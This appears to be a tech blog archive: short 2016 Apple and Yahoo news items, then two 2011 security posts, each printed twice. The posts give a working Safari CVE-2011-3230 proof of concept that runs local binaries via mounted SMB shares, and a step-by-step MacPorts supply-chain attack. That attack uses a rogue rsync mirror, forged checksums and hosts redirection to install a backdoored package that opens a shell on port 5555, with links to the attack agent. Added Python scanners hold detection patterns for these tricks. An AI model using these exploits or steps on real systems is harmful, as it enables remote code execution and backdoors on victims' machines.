Thursday, 28 July 2016

Yahoo Messenger relaunched new features for Mac and Windows

Yahoo was acquired by mobile carrier Verizon for $4.83 billion earlier this week, and now the company has relaunched the Yahoo Messenger app for Mac and Windows PCs.

"Our new stage outfits you with a snappy and basic way to deal with send (and unsend) messages, and in addition photos and vivified GIFs," Yahoo wrote on its Tumblr site.

The new Yahoo Messenger app comes with a fresh look and a handful of new features. Users will now be able to unsend messages, reply using GIFs and send multiple photos by simply dragging them into a conversation.

To send a GIF, users simply need to tap the GIF icon on the lower left-hand side of the conversation. This brings up a GIF search engine where users can easily look for any GIFs they want to send.

The unsend button is probably the best new feature in Yahoo Messenger. It lets users quickly retract a message, photo or even GIF that they have just sent.

This is really useful, especially for those using Yahoo Messenger to communicate with coworkers or clients.

To take advantage of the feature, users simply need to move their mouse over a message, photo or GIF and click the unsend icon that appears.

Yahoo Messenger has been around since 1999, and it has evolved over the years. Unfortunately, the smartphone era arrived and brought various other apps that offered the same messaging experience.

With the relaunch of the new and improved Messenger app, Yahoo is hoping to get people back to using its messaging platform.

The refreshed Messenger app arrives just about a week before the legacy version of the app for Windows and Mac goes offline on Aug. 5, as pointed out by VentureBeat.

Friday, 24 June 2016

How to create an iPhone Wifi Hotspot

A Wi-Fi hotspot turns the iPhone into a Wi-Fi router (like the one in your home). The iPhone broadcasts a Wi-Fi network that your Mac can connect to. The Mac connects to the iPhone over Wi-Fi, and the iPhone connects to the internet using its 3G/4G cellular data connection. It's clever stuff and a neat trick to know.

Here's how to turn an iPhone into a Wi-Fi hotspot:


1. Tap Settings and Mobile.

2. Tap Personal Hotspot and set Personal Hotspot to On.

4. Then tap Turn on Wi-Fi and Bluetooth.

5. Tap Wi-Fi Password and enter a suitable password (this can be any password you choose; it's not related to your Apple ID or usual Wi-Fi connection).

6. Now check the name of the hotspot listed under To Connect Using Wi-Fi (ours is "iPhone 5s").

7. Click AirPort in the menu bar at the top of your MacBook's screen and choose the Wi-Fi hotspot (iPhone 5s in our case).

8. Enter the password from Step 4.

That should be it. You should now be able to browse the web on your Mac (or Wi-Fi iPad) using the connection provided by your iPhone.

Tuesday, 21 June 2016

Rumor: iPhone 7 roll out 3.5mm Earphone and a Lightning Adapter

Rumor: iPhone 7 roll out 3.5mm EarPods and a Lightning Adapter

Apple iPhone - One of the more consistent rumors, despite seeing some pushback recently, is that the iPhone 7 and iPhone 7 Plus will ditch the 3.5mm headphone jack in favor of the Lightning port, or Bluetooth, for headphones.

Now, according to a new report from Mac Otakara, citing sources the publication spoke with at this year's Computex Taipei, there may be a couple of key changes in place. First, the report echoes previous rumors, saying that Apple will indeed drop the 3.5mm headphone jack in its upcoming iPhone models. However, Apple will apparently not include Lightning-equipped EarPods in the box.

As it stands, this is the first time that something like this has been suggested. Leading up to this report, the rumors have gone with Apple including Lightning headphones right out of the box, while also pushing truly wireless headphones as a separate purchase, which would connect to the new iPhones via Bluetooth.

Could this be a sign that the 3.5mm headphone jack is here to stay, or do you think Apple would really include an adapter? Or is the likely outcome that Apple will include Lightning headphones?


Sunday, 19 June 2016

macOS Sierra Update: rearrange third-party menu

Apple is finally giving Mac users the ability to rearrange third-party menu bar items in its upcoming macOS Sierra update. Until now, we've been able to rearrange Apple's own menu bar items, but not those from other apps.

"Without a doubt, the macOS Sierra beta makes it possible for Mac customers to modify pariah menu bar (NSStatusItems) extra things, and that is to some degree a noteworthy difficulty," explains 9to5Mac.

One thing you can't do in macOS Sierra is hide or disable those menu bar icons. However, most apps allow you to do this within their own preferences.

Bartender is a great app, but it's a waste if all you need is to rearrange your menu bar icons. Being able to do this natively in macOS Sierra is a significant improvement that many Mac owners will welcome.

macOS Sierra will roll out this fall as a free upgrade for compatible Macs. An early beta is already available for registered developers, but it is not recommended for primary Macs. It's likely Apple will offer a public beta when macOS is more stable.

Tuesday, 18 October 2011

Safari 5.1.1 Old School Remote Execution PoC (CVE-2011-3230)


On October 12, Aaron Sigel published an interesting bug (CVE-2011-3230) in the latest version of Safari < 5.1.1, Mac OS X version only.

As Aaron notes, this vulnerability “allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page.”

The following PoC illustrates the vulnerability:

<html>
<head>
<base href="file://">
<script>
 function DoIt() {
  alert(document.getElementById("cmdToRun").value);
  document.location=document.getElementById("cmdToRun").value;
 }
</script>
</head>
<body>
<select id="cmdToRun">
 <option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>
 <option value="/etc/passwd">Launch /etc/passwd</option>
 <option value="/Applications/Utilities/Bluetooth File Exchange.app">
Launch Bluetooth File Exchange.app</option>
</select>
<br />
<input type=button value="Launch" onclick="DoIt()">
<br />
</body>
</html>


As we can see, no arguments can be passed, and you need to know the exact path of what you want to execute.

Additionally, LaunchServices checks the quarantine bit, so a binary downloaded from the internet cannot be executed directly.

By modifying the exploit slightly, we manage to execute a binary that we control:



<html>
<head>
<base href="file://">
</head>
<body>
    <iframe src="smb://Administrador:X@x.x.x.x/C$"
      width="0" height="0" scrolling="auto" frameborder="1" transparency>
    </iframe>
<script>
function sleep(milliSeconds){
        var startTime = new Date().getTime(); // get the current time
        while (new Date().getTime() < startTime + milliSeconds); // hog cpu
}
sleep(8000);
document.location="/Volumes/C$/infobyte/ls";
</script>
</body>
</html> 



In this example:
1) We force a share to be mounted over SMB, which lets us guess the directory /Volumes/[NAMESHARE]
2) Then we sleep to allow time for the share to mount
3) Finally we execute the binary, in this case a simple "ls"

Other protocols such as FTP/AFP can be used for this attack

The problem is that a warning asks the user for confirmation before running it.

We added the safari.pm module to evilgrade to take advantage of this vulnerability and make users believe it is an update.
The latest version can be found at: https://code.google.com/p/isr-evilgrade/source/list

The fun part is that there are file types unknown to the Mac, and these can be executed by LaunchServices without warnings.



The following PoC uses FTP as the protocol and then executes a PDF
http://www.infobytesec.com/exploit/ISR-safaripoc.html

Let's imagine, for example, combining this vulnerability with some explosive file type.
An excellent old school bug; congratulations to Aaron Sigel (@diretraversal) on the discovery.

References:
http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html
http://support.apple.com/kb/HT5000



Safari 5.1.1 Old School Remote Execution PoC (CVE-2011-3230)


On October 12, Aaron Sigel published an interesting bug (CVE-2011-3230) in the latest version of Safari, version < 5.1.1 (Mac OS X only).

Aaron noted that “It allows you to send any 'file:' url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page.”

The following PoC demonstrates the vulnerability:

<html>
<head>
<base href="file://">
<script>
 function DoIt() {
  alert(document.getElementById("cmdToRun").value);
  document.location=document.getElementById("cmdToRun").value;
 }
</script>
</head>
<body>
<select id="cmdToRun">
 <option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>
 <option value="/etc/passwd">Launch /etc/passwd</option>
 <option value="/Applications/Utilities/Bluetooth File Exchange.app">
Launch Bluetooth File Exchange.app</option>
</select>
<br />
<input type=button value="Launch" onclick="DoIt()">
<br />
</body>
</html>

As we can see above, you cannot pass arguments, and you need to know the exact path of what you want to run.

Additionally, LaunchServices checks the "quarantine bit", so a binary downloaded from the Internet cannot be executed directly.

By modifying the exploit slightly, we can execute a binary that we control:



<html>
<head>
<base href="file://">
</head>
<body>
    <iframe src="smb://Administrador:X@x.x.x.x/C$"
      width="0" height="0" scrolling="auto"   frameborder="1" transparency>
    </iframe>
<script>
function sleep(milliSeconds){
        var startTime = new Date().getTime(); // get the current time
        while (new Date().getTime() < startTime + milliSeconds); // hog cpu
}
sleep(8000);
document.location="/Volumes/C$/infobyte/ls";
</script>
</body>
</html> 



In this example:
1) We mount an SMB share, so we can guess the directory /Volumes/[NAMESHARE]
2) Then we sleep for a while until the share is mounted.
3) Finally we run the binary, in this case a simple "ls".

Other protocols, such as FTP or AFP, can also be used for this attack.

The problem is that an alert pops up asking the user to confirm execution of the binary.

We just added the module safari.pm to evilgrade to take advantage of this vulnerability and make users believe it's an update.

Download the latest version: https://code.google.com/p/isr-evilgrade/source/list

The funny thing is that there are file types unknown to Mac OS X, and these can be executed by LaunchServices without user interaction.


The following PoC uses the FTP service and then opens a PDF:
http://www.infobytesec.com/exploit/ISR-safaripoc.html

Imagine, for example, the combination of this vulnerability with a dangerous file type.
Congratulations to Aaron Sigel (@diretraversal) on the research into this 'old school' vulnerability.

Reference:
http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html
http://support.apple.com/kb/HT5000
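
An added example, not part of the original post or of Aaron Sigel's advisory: a heuristic content scanner in Python that flags the markup patterns both PoCs above rely on (a `file:` base URL, a frame whose source mounts a remote share, and script navigation to a local path). The sample pages, the host `fileserver.example` and the finding labels are constructed for this example.

```python
import re
from html.parser import HTMLParser

MOUNT_SCHEMES = ("smb", "afp", "ftp")   # protocols the post names for mounting a share
NAV = re.compile(r"""location(?:\.href)?\s*=\s*["']([^"']+)["']""")

class LaunchScanner(HTMLParser):
    """Collects the markup patterns used by the PoCs above (heuristic only)."""
    def __init__(self):
        super().__init__()
        self.file_base = False
        self.findings = []
        self.nav_targets = []
        self._script = None          # text buffer while inside <script>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base" and (attrs.get("href") or "").lower().startswith("file:"):
            self.file_base = True
            self.findings.append("base-file-url")
        src = (attrs.get("src") or "").lower()
        scheme = src.split("://", 1)[0]
        if tag in ("iframe", "frame", "embed") and "://" in src and scheme in MOUNT_SCHEMES:
            self.findings.append("remote-mount:" + scheme)
        if tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self.nav_targets += NAV.findall("".join(self._script))
            self._script = None

def scan(html):
    """Return findings for one page; '/' targets count only under a file: base."""
    p = LaunchScanner()
    p.feed(html)
    p.close()
    out = list(p.findings)
    for target in p.nav_targets:
        if target.lower().startswith("file:") or (p.file_base and target.startswith("/")):
            out.append("local-path-navigation:" + target)
    return out

# Constructed samples: one modelled on the second PoC, one ordinary page.
POC_LIKE = """<html><head><base href="file://"></head><body>
<iframe src="smb://user:X@fileserver.example/SHARE" width="0" height="0"></iframe>
<script>
var t = new Date().getTime(); while (new Date().getTime() < t + 8000);
document.location="/Volumes/SHARE/tool";
</script></body></html>"""
BENIGN = """<html><head><base href="https://www.example.com/"></head>
<body><script>if (a < b) { window.location = "/login"; }</script></body></html>"""

if __name__ == "__main__":
    print(scan(POC_LIKE))
    print(scan(BENIGN))
```

Navigation built from a runtime value, as in the first PoC's `DoIt()`, is not resolved by this static check; only the `file:` base is reported for such a page.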

Thursday, 7 July 2011

Pwning Mac OS X with evilgrade + MacPorts


The idea of this post is to show the flaws in package distribution in the MacPorts project for Mac OS X.

MacPorts works as follows:

a) It uses an rsync server to update its repository
b) Packages are distributed via http / ftp
c) Before installing a new package, it is checked against the MD5/SHA1 in the local repository



To perform the attack we need to do the following tasks:
1) Prepare the rsync server on the attacker's machine (192.168.10.133) with all the files of rsync.macports.org:

mkdir -p /dev/evilgrade/release/ports
mkdir -p /dev/evilgrade/release/base
#Get the files from rsync.macports.org
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/ports/ /dev/evilgrade/release/ports/
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/base/ /dev/evilgrade/release/base/

2) Configure the file /etc/rsyncd.conf:

max connections = 20
log file = /var/log/rsync.log
timeout = 300
[release]
comment = Stuff
path = /dev/evilgrade/release/
read only = yes
list = yes
uid = nobody
gid = nogroup
# auth users = craig
# secrets file = /etc/rsyncd.secrets
# change for your subnet
hosts allow = 192.168.10.0/24
3) Then start the rsync server: /etc/init.d/rsync start
4) In this case we will attack the serf package in the www category. The idea is that installing this package creates a listening shell on port 5555.
We have to edit the repository file /dev/evilgrade/release/ports/www/serf/Portfile and replace the md5 value in checksums with the hash of our payload/agent, found in /evilgrade/agent/serf-0.7.2.tar.bz2

You could also prepare the repository so that all Portfiles point to the same package with the same md5, so that any installation via port would infect the victim.

This agent has a line (132) in Makefile.in that leaves a shell on port 5555.

4) On the victim machine (192.168.10.42), for this test add the following lines to /etc/hosts, or perform any traffic forwarding attack:
192.168.10.133 serf.googlecode.com rsync.macports.org
5) Start evilgrade on the attacker machine 192.168.10.133
6) On the victim machine run a "sudo port selfupdate" and then "sudo port install serf"

7) We verify that our attacker is receiving the rsync request by reading the file /var/log/rsync.log
Check what happened in evilgrade:
8) Enjoy your shell!
Download the MacPort agent from http://www.infobytesec.com/down/macportsevilgrade.tar.gz and uncompress it in the evilgrade path.
Remember to keep your systems updated! ;)
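
An added example, not part of the original post or of MacPorts: a Python check for the tampering step described above. It compares Portfiles from a fresh sync against a copy kept from a trusted sync and flags a checksum that changed while the version did not, along with md5/sha1-only checksums and cleartext master_sites. The Portfile excerpts, digests and the port `devel/example` are constructed; an upstream re-roll of a tarball also triggers the first finding, so treat it as an indicator to investigate.

```python
WEAK_DIGESTS = {"md5", "sha1"}          # the only digest types the post mentions

def parse_portfile(text):
    """Extract version, master_sites and checksums from Portfile text."""
    info = {"version": None, "master_sites": [], "checksums": {}}
    for line in text.replace("\\\n", " ").splitlines():   # join '\' continuations
        words = line.split()
        if len(words) < 2:
            continue
        key, args = words[0], words[1:]
        if key == "version":
            info["version"] = args[0]
        elif key == "master_sites":
            info["master_sites"] = args
        elif key == "checksums":
            # "checksums md5 <hex> sha1 <hex>" -> {"md5": hex, "sha1": hex}
            info["checksums"] = dict(zip(args[0::2], args[1::2]))
    return info

def audit(baseline, synced):
    """Compare freshly synced Portfiles against a trusted earlier copy."""
    findings = []
    for port in sorted(synced):
        new = parse_portfile(synced[port])
        old = parse_portfile(baseline[port]) if port in baseline else None
        if old and old["version"] == new["version"] and old["checksums"] != new["checksums"]:
            findings.append((port, "checksum changed, version unchanged"))
        if new["checksums"] and set(new["checksums"]) <= WEAK_DIGESTS:
            findings.append((port, "md5/sha1 only"))
        if any(s.startswith(("http://", "ftp://")) for s in new["master_sites"]):
            findings.append((port, "cleartext master_sites"))
    return findings

# Constructed Portfile excerpts (not real MacPorts data); devel/example is hypothetical.
BASELINE = {
    "www/serf": "version 0.7.2\n"
                "master_sites http://serf.googlecode.com/\n"
                "checksums md5 " + "a" * 32 + " \\\n"
                "          sha1 " + "b" * 40 + "\n",
    "devel/example": "version 1.0\n"
                     "master_sites https://downloads.example.org/\n"
                     "checksums sha256 " + "c" * 64 + "\n",
}
# Same tree after a sync in which only the serf md5 was replaced.
SYNCED = dict(BASELINE)
SYNCED["www/serf"] = BASELINE["www/serf"].replace("a" * 32, "d" * 32)

if __name__ == "__main__":
    for port, issue in audit(BASELINE, SYNCED):
        print(port, "-", issue)
```

The comparison is only as trustworthy as the baseline copy, which must come from a sync made over a path the attacker did not control.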

Pwning Mac OS X with evilgrade + MacPorts


The idea of this post is to demonstrate the flaws in package distribution in the MacPorts project for Mac OS X systems
Broadly speaking, port uses:
a) An rsync server to update its repository
b) Packages are distributed over http/ftp
c) Before installing a new package, it checks the md5/sha1 from the local repository against the new file; if it is valid, it installs the package.
To carry out the attack we need to perform the following tasks:
1) We prepare the rsync server on the attacking machine (192.168.10.133) with the complete valid repository from rsync.macports.org:
mkdir -p /dev/evilgrade/release/ports
mkdir -p /dev/evilgrade/release/base
#Get the necessary information
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/ports/ /dev/evilgrade/release/ports/
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/base/ /dev/evilgrade/release/base/

2) We configure the file /etc/rsyncd.conf:

max connections = 20
log file = /var/log/rsync.log
timeout = 300
[release]
comment = Stuff
path = /dev/evilgrade/release/
read only = yes
list = yes
uid = nobody
gid = nogroup
# auth users = craig
# secrets file = /etc/rsyncd.secrets
# change to the corresponding subnet
hosts allow = 192.168.10.0/24
3) Then we start our server: /etc/init.d/rsync start
4) In this case we are going to attack the serf package in the www category. The idea is that installing this package leaves us a shell on port 5555
In the repository we have to edit the file /dev/evilgrade/release/ports/www/serf/Portfile and change the md5 in checksums to the hash of our payload/agent, located at /evilgrade/agent/serf-0.7.2.tar.bz2
The repository could also be prepared so that all Portfiles point to the same package with the same md5, so that any installation via port would infect the victim
This agent has a line (132) in Makefile.in to leave a shell on 5555
4) On the victim machine (192.168.10.42), for this test we add the following lines to /etc/hosts, or carry out some traffic redirection attack:
192.168.10.133 serf.googlecode.com rsync.macports.org
5) We start evilgrade on the attacking machine 192.168.10.133
6) On the victim machine we run “sudo port selfupdate” and then “sudo port install serf”

7) We verify that our attacker is receiving the rsync request by reading the file /var/log/rsync.log
and then the request in evilgrade:
8) Finally we connect to our shell
To obtain the agent and the MacPort module, download the following package http://www.infobytesec.com/down/macportsevilgrade.tar.gz and unpack it in the evilgrade root directory.
Remember to keep your systems up to date ;)